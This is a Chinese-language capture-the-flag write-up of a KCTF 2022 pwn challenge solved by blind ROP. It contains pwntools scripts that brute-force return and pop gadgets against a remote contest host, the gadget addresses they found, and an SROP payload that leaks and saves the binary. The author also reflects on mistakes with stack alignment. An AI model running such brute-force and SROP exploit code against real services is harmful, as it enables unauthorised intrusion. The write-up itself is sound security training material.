-
-
[原创]【KCTF-pwn】2022 春第六题 BROP
-
发表于: 2023-6-8 00:25 9731
-
nc远程连接程序,接收到hacker, TNT!\n
后等待用户输入,输入A*16
后获得回馈TNT TNT!\n
,输入A*17
后连接断开,推测程序如下:
尝试爆破返回地址低字节,最终获得回馈如下
再次尝试爆破基址得出base=0X400000
,并且多次连接不会改变,推断程序没有开启PIE
;构造rop尝试返回地址仅出现3种情况
最后得到如下结果
经测试地址及指令如下
最终成功泄露出程序
写出拖进IDA分析后可知.data
段是可写的,始于0x600108
经过泄露的程序进行分析之后更正sysgadget
避免导致栈操作异常
0x4000C7 => 0X400100
因为SROP
的题做的少,并且也是第一次做BROP
,所以还是踩了非常多的坑
首先就是投入了过多的事件去猜测而非测试,在循环测试popgadget
的时候总是纠结于去根据其指令长度去猜测具体指令
有明确的地址和指令不看结果还在用遍历出来的不确定的gadget,导致做了很多未知的操作而影响exploit
先看两段payload
首先两段死牛肉是padding,readRet也无异常,不破坏栈平衡,从sysCall开始导致我踩坑,看汇编
是的,在系统调用完还有一个add rsp,10h
的操作呢
而由SROPA->read(0,0x600108,0x400)
可知当SropA
执行完后实际上我的rsp
需要越过sh
字符串进而指向readRet
,于是我在忽视了上述栈平衡操作的情况下进行了如下的srop
布置
但是由于add rsp, 10h
的存在,导致srop
默认既为
所以我非但不能给rsp+8
,我还得在payloadB->sh
后面填上一坨死牛肉,才不会影响程序流程
这里没啥问题的,迎合add rsp, 10h
再加个死牛肉就好了
void myRead(){
char buf[
8
]
=
{
0
};
read(
0
,buf,
0x1000
);
return
;
}
int
main(){
puts(
"hacker, TNT!"
);
myRead()
puts(
"TNT TNT!"
);
return
0
;
}
void myRead(){
char buf[
8
]
=
{
0
};
read(
0
,buf,
0x1000
);
return
;
}
int
main(){
puts(
"hacker, TNT!"
);
myRead()
puts(
"TNT TNT!"
);
return
0
;
}
『NORMAL HEAD』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XB0
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XB5
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XB6
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XC9
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XED
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XEE
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XEF
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XF2
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XF3
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XD8
』
『NORMAL HEAD』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XB0
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XB5
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XB6
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XC9
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XED
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XEE
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XEF
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XF2
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XF3
』
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0XD8
』
def
testRetRop(base):
for
i
in
range
(base,base
+
0x1000
):
p,pb,libc
=
init(r
=
"123.59.196.133:10012"
,log
=
"info"
,lg
=
1
)
p.sendlineafter(
"hacker, TNT!\n"
,b
"A"
*
0x10
+
p64(i)
+
p64(mainAddr))
try
:
r
=
p.recvuntil(
"hacker, TNT!\n"
,timeout
=
0.1
)
if
(r
=
=
b""):
p.close()
continue
else
:
vLog(
"RET"
,i)
p.close()
continue
except
:
p.close()
continue
def
testPopRop(base,c):
for
i
in
range
(base,base
+
0x1000
):
p,pb,libc
=
init(r
=
"123.59.196.133:10012"
,log
=
"info"
,lg
=
1
)
p.sendlineafter(
"hacker, TNT!\n"
,b
"A"
*
0x10
+
p64(i)
+
p64(
0
)
*
c
+
p64(mainAddr))
try
:
r
=
p.recvuntil(
"hacker, TNT!\n"
,timeout
=
0.1
)
if
(r
=
=
b""):
p.close()
continue
else
:
vLog(
"POP {}"
.
format
(c),i)
p.close()
continue
except
:
p.close()
continue
def
testRetRop(base):
for
i
in
range
(base,base
+
0x1000
):
p,pb,libc
=
init(r
=
"123.59.196.133:10012"
,log
=
"info"
,lg
=
1
)
p.sendlineafter(
"hacker, TNT!\n"
,b
"A"
*
0x10
+
p64(i)
+
p64(mainAddr))
try
:
r
=
p.recvuntil(
"hacker, TNT!\n"
,timeout
=
0.1
)
if
(r
=
=
b""):
p.close()
continue
else
:
vLog(
"RET"
,i)
p.close()
continue
except
:
p.close()
continue
def
testPopRop(base,c):
for
i
in
range
(base,base
+
0x1000
):
p,pb,libc
=
init(r
=
"123.59.196.133:10012"
,log
=
"info"
,lg
=
1
)
p.sendlineafter(
"hacker, TNT!\n"
,b
"A"
*
0x10
+
p64(i)
+
p64(
0
)
*
c
+
p64(mainAddr))
try
:
r
=
p.recvuntil(
"hacker, TNT!\n"
,timeout
=
0.1
)
if
(r
=
=
b""):
p.close()
continue
else
:
vLog(
"POP {}"
.
format
(c),i)
p.close()
continue
except
:
p.close()
continue
『RET』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X400101
』
『RET』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X400106
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000F5
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000FA
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000FB
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000FD
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000FE
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X400100
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X400102
』
『RET』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X400101
』
『RET』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X400106
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000F5
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000FA
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000FB
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000FD
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000FE
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X400100
』
『POP
2
』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X400102
』
『NORMAL HEAD』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000B0
』 main函数地址
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000C7
』 syscall
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000C9
』 call func
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000EE
』 read ret
『NORMAL HEAD』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000B0
』 main函数地址
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000C7
』 syscall
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000C9
』 call func
『STOP』
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>『
0X4000EE
』 read ret
###已知地址
mainAddr
=
0X4000B0
readRet
=
0X4000EE
sysCall
=
0X4000c7
base
=
0x400000
p,pb,libc
=
init(r
=
"123.59.196.133:10053"
,log
=
"debug"
,lg
=
0
)
frame
=
SigreturnFrame()
frame.rip
=
sysCall
frame.rax
=
1
frame.rdi
=
1
frame.rsi
=
base
frame.rdx
=
0x1000
frame.rsp
=
base
frame.rbp
=
base
p.sendlineafter(
"hacker, TNT!\n"
,b
"A"
*
0x10
+
p64(readRet)
+
p64(sysCall)
+
bytes(frame))
sleep(
0.1
)
p.send(b
"A"
*
15
)
r
=
p.recv(
0x578
)
f
=
open
(
"./pwn"
,
"wb"
)
f.write(r)
f.flush()
p.interactive()
###已知地址
mainAddr
=
0X4000B0
readRet
=
0X4000EE
sysCall
=
0X4000c7
base
=
0x400000
p,pb,libc
=
init(r
=
"123.59.196.133:10053"
,log
=
"debug"
,lg
=
0
)
frame
=
SigreturnFrame()
frame.rip
=
sysCall
frame.rax
=
1
frame.rdi
=
1
frame.rsi
=
base
frame.rdx
=
0x1000
frame.rsp
=
base
frame.rbp
=
base
p.sendlineafter(
"hacker, TNT!\n"
,b
"A"
*
0x10
+
p64(readRet)
+
p64(sysCall)
+
bytes(frame))
sleep(
0.1
)
p.send(b
"A"
*
15
)
r
=
p.recv(
0x578
)
f
=
open
(
"./pwn"
,
"wb"
)
f.write(r)
f.flush()
p.interactive()
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课